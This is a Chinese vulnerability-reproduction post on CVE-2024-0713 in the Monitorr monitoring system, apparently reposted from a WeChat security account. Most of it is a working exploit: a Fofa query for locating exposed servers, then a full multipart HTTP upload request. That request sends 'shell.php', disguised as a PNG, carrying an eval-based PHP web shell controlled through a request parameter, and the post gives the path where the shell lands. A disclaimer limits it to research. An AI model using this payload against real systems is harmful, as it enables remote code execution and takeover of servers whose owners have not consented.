0x01 漏洞简述
—
Monitorr是一个开源的轻量级监控系统,用于实时监测和展示服务器、网络和服务的状态。它提供了直观的仪表盘,显示各项监控指标和警报信息,帮助管理员及时发现和解决问题。Monitorr支持自定义监控项和报警规则,可以针对不同的需求进行配置。此外,它还具备响应式设计和易于安装的特点,方便用户快速部署和使用。Monitorr是一个简单而功能强大的监控系统,适用于小型到中型的环境,能够提供可靠的监控和报警功能。
0x02 资产测绘
—
Fofa语法:body="assets/php/timestamp.php"
0x03 漏洞复现
—
POST /assets/php/upload.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4)Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q------WebKitFormBoundaryMmx988TUuintqO4QContent-Disposition: form-data; name="fileToUpload"; filename="shell.php"Content-Type: image/png{{unquote("x89PNGx0dx0ax1ax0ax00x00x00x0dIHDRx00x00x01x00x00x00x01x00x08x06x00x00x00\rxa8fx00x00x03x1eIDATxx9cxedxd4x01x09x00Ax10xc4xb0Yxxffx96xefx854x81Zxe8mxefxdd6Ixbdxbexddx80x28x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x800x03x80xb0x1fxbdxf4x07xfaxeb>xbexabx00x00x00x00IENDxaeB`x82x0dx0a<?php class Gn261550 x7b public function __constructx28$HW579x29x7b @evalx28"/*ZWabn8zLCk*/".$HW579."/*ZWabn8zLCk*/"x29; x7dx7dnew Gn261550x28$_REQUEST['123']x29;?>")}}------WebKitFormBoundaryMmx988TUuintqO4Q--
上传文件路径
/assets/data/usrimg/shell.php
原文始发于微信公众号(代码审计战士CodeWarrior):CVE-2024-0713
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论